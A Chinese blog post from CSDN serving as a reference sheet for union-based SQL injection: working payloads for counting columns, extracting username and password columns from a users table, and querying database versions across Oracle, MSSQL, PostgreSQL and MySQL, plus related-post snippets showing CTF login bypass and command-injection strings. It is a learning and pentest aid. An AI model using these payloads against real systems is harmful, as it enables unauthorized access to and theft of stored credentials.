SQL注入参考

已于 2022-01-25 17:38:37 修改
阅读量282 收藏
点赞数
文章标签: sql postgresql 数据库
于 2022-01-22 15:00:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tainqiuer123/article/details/122607951
版权

一、union注入(联合查询)

1、如何测试注入

首先找到注入点:

1)后面拼接'+union+select+null--

2)后面拼接'+union+select+null,null--

3)后面拼接'+union+select+null,null,null--

以此类推,确定column的数量,假如数量对上一般返回码200,反之500

4)把null替换成类似'abcdd',测试这个column是否返回的是字符串,假如是字符串即替换成列名称比如username、password的列。例如:'+union+select+'abcdd',null,null--

5)后面拼接'+union+select+username,null,null+from+users--

6)需要把两个数据合并成一个列,就需要了解一下:

数据库连接符
数据库类型拼接方式
Oracle'foo' || 'bar'
Microsoft'foo' + 'bar'
PostgreSQL'foo' || 'bar'
MySQLconcat('foo','bar')

例如'+union+select+username||'~'||password,null,null+from+users--

2、如何获取数据库版本

1)oracle查询必须指定一个表名,有一个表dual可以实现这个需求:

'+union+select+null,null+from+dual--

2)和1测试注入点的方式类似,确定字符串的返回位置,进行测试须知:

数据库类型版本语句
Oracle

SELECT banner FROM v$version

SELECT version FROM v$instance

MicrosoftSELECT @@version
PostgreSQLSELECT version()
MySQLSELECT @@version

例如:'+union+selecct+banner,null,null+from+v$version--

AdaTina
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql常用函数汇总(待续)
weixin_42420792的博客
09-20 139
一、数学函数 ABS(x) 返回x的绝对值 BIN(x) 返回x的二进制(OCT返回八进制,HEX返回十六进制) CEILING(x) 返回大于x的最小整数值 EXP(x) 返回值e(自然对数的底)的x次方 FLOOR(x) 返回小于x的最大整数值 GREATEST(x1,x2,…,xn)返回集合中最大的值 LEAST(x1,x2,…,xn) 返回集合中最小的值 LN(x) 返回x的自然对数 LOG(x,y)返回x的以y为底的对数 MOD(x,y) 返回x/y的模(余数) PI()返回pi的值(圆周率) R
sql注入select/union select
@一只躺平的猪@的博客
07-14 3048
selectselect 1 from table、 select count(1) from table、select sum(1) from table union selectunion语句使用条件、判断字段数 union select 1,2(或union select null,null)、 判断回显位置
自学SQL注入总结一:union注入
yesweller的博客
11-30 511
@自学SQL注入总结 先理解三层架构中信息流: 1.用户向Web服务器发送请求。 2.Web服务器检索用户数据,创建包含用户输入的SQL语句,然后向数据库服务器发送查询。 3.数据库服务器执行SQL查询并将结果返回给Web服务器。请注意,数据库服务器不知道应用逻辑,它只是执行查询并返回结果。 4.Web服务器根据数据库响应动态的创建HTML页面 引用SQL注入攻击与防御(第二版) 一:什么是SQL...
sql注入中的union联合查询,union select 1,2,3
m0_51756263的博客
07-10 9127
sql注入中的union联合查询,union select 1,2,3
Bugku login2
m0_63253040的博客
07-24 449
输入127.0.0.1|sleep5有延迟说明命令执行了,但是输出可能被过滤了。进入后是一个进程监控系统根据题目提示这里应该就是要命令执行了。这里利用unionselect插入密码的md5值绕过。进来先试了一遍万能密码,弱口令,目录爆破都没结果。在响应头里有tip提示,base64解码得到源码。显示如果密码等于它的md5值则应该能登陆成功。127.0.0.1|ls/没有回显。我们利用>将输出结果保存到文件中查看。进入环境是一个登录页面。...
整理比较全的Access SQL注入参考
09-14
Access SQL 注入参考 Access SQL 注入是数据库安全领域中的一种常见的攻击手法,通过向 Access 数据库中注入恶意的 SQL 代码,攻击者可以读取、修改或删除敏感数据。本文档旨在整理 Access SQL 注入的相关知识点,...
sql注入论文
01-08
SQL注入】是一种常见的网络安全问题,它发生在应用程序未能正确过滤用户输入的数据,导致恶意SQL代码被插入到数据库查询中执行。这种攻击方式可以允许攻击者获取、修改、删除数据库中的敏感信息,甚至完全控制...
超级SQL注入工具
03-31
1. **超级SQL注入工具使用说明书V1.1 20190303.docx**:这是一个详细的操作指南,可能包含了工具的功能介绍、安装步骤、使用方法、示例教程等内容,对于初学者来说是必不可少的参考资料。 2. **SuperSQLInjection....
参考SQL注入漏洞全接触
08-15
数据库注入问题的详解,里面有注入的例子,仅供学习,不可用于非法注入。
asp 防sql注入 参考代码
04-17
asp 防sql注入参考代码 这是我用的网站上的代码 此文件作为包含文件 被包含在每个页面 作用:防止sql注入
SQL注入绕过
最新发布
qq_45557130的博客
10-10 1850
sql注入绕过
[GXYCTF2019]BabySQli | 何为Union?
wuuconix's blog
05-21 199
[GXYCTF2019]BabySQli | 何为Union? 这道题主要考察利用union select绕过md5密码验证,掌握新姿势! 过滤的一些东西 试了一下,过滤了or和等于。但是用大写Or就可以绕过,等于可以用like绕过。 题目回显 题目的回显主要有三类wrong user wrong pass 和报错信息 过程模拟 首先试试万能密码! -1' Or 1 like 1# 返回wrong pass 而不是wrong user。说明我们用户名这关已经过了,只不过它还有一层对密码的验证,一般
[CTF] union select 联合查询,linux命令执行
V1040375575的博客
12-26 796
文章目录前言一、题目二、解题步骤1.使用bp抓包分析2.成功登陆后台 前言 CTF 学习记录:union select 联合查询,linux命令执行漏洞 一、题目 提  示: hint:union,命令执行 描  述: 命令执行 打开题目页面是一个login登陆 二、解题步骤 1.使用bp抓包分析 抓取登陆发送包: POST /login.php HTTP/1.1 Host: 1.1.1.1:10766 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64;
union 联查_union联合查询绕过登录的万能密码解析
weixin_39610488的博客
12-19 1680
—————————asp代码—————————————–username = request.form("username") password = request.form("password") set rs=server.createobject("adodb.recordset") sql = "select[password] from admin where UserName='"&a...
程序逻辑问题--实验吧
Gunther的博客
09-01 5019
程序逻辑问题 题目提示是绕过,本题考点:sql语句注入 <?php if($_POST[user] && $_POST[pass]) { $conn = mysql_connect("********, "*****", "********"); mysql_select_db("phpformysql") or die("Could not select database
CTF writeup 2_南邮网络攻防训练
热门推荐
Troy
10-28 146万+
地址地址WEB签到题这一定是最简单的 传送门:http://chinalover.sinaapp.com/web1/“key在哪里? ” 在源码里~md5 collision源码<?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' && $md51
渗透测试知识点--选择题
m0_52996993的博客
01-07 2万+
RDP的端口号为() A. 3389 B. 23 C. 22 D. 443 Burp Suite 是用于攻击()的集成平台。 A. web 应用程序 B. 客户机 C. 服务器 D. 浏览器 使用nmap进行ping扫描时使用的参数() A. -sP B. -p C. -p0 ...
union all对查询结果为NULL的不会去重,对于查询条件查询结果为null 的union all查询,结果为NULL会去重;
qq_35222843的博客
12-26 6725
问题背景: 一个同事问我,union all 不是不去重吗?为什么我昨天查还是对的,今天查询就错了; 然后我说查询条件不对,他认为是因为union all对查询结果为NULL去重了; 问题论点:union all对查询结果为NULL会去重吗? 验证猜想:union all对查询结果为NULL不会去重 1.首先我拿一个为null的字段进行union all ; 2.得出验证结...
sqll加上union后无数据_数据库允许空值(null),往往是悲剧的开始(1分钟系列)...
weixin_39567943的博客
11-04 569
数据库字段允许空值,会遇到一些问题,此处包含的一些知识点,和大家聊一聊。数据准备:create table user (id int,name varchar(20),index(id))engine=innodb;insert into user values(1,'shenjian');insert into user values(2,'zhangsan');insert into...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值